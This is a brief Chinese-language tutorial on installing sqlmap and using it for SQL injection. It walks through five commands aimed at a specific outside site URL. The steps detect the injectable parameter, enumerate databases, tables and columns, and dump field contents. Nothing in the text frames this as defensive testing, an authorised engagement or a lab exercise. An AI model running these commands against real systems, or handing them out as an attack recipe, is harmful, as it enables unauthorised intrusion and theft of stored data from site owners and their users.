sqlmap 是一个基于命令行的半自动化sql注入攻击工具,成功执行sqlmap,需要安装python(建议用python2)+sqlmap
---自动百度安装
tip:
1、python安装后,设置系统环境变量--path,最终cmd下输出python后有输出即可。
2、sqlmap直接安装到python目录下(例如直接解压到D:/Python27),生成--sqlmapproject-sqlmap-5650abb,
cmd下执行后有如下图展示,代表成功
开始sql注入尝试
1、扫描站点是否存在注入漏洞
python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1"
2、扫描数据库
python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1" --dbs
3、扫描数据库表
python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1" -D 数据库名 --tables
4、扫描字段名
python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1" -D 数据库名 -T 表名 --columns
5、获取字段内容
python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1" -D 数据库名 -T 表名 -C 字段值 --dump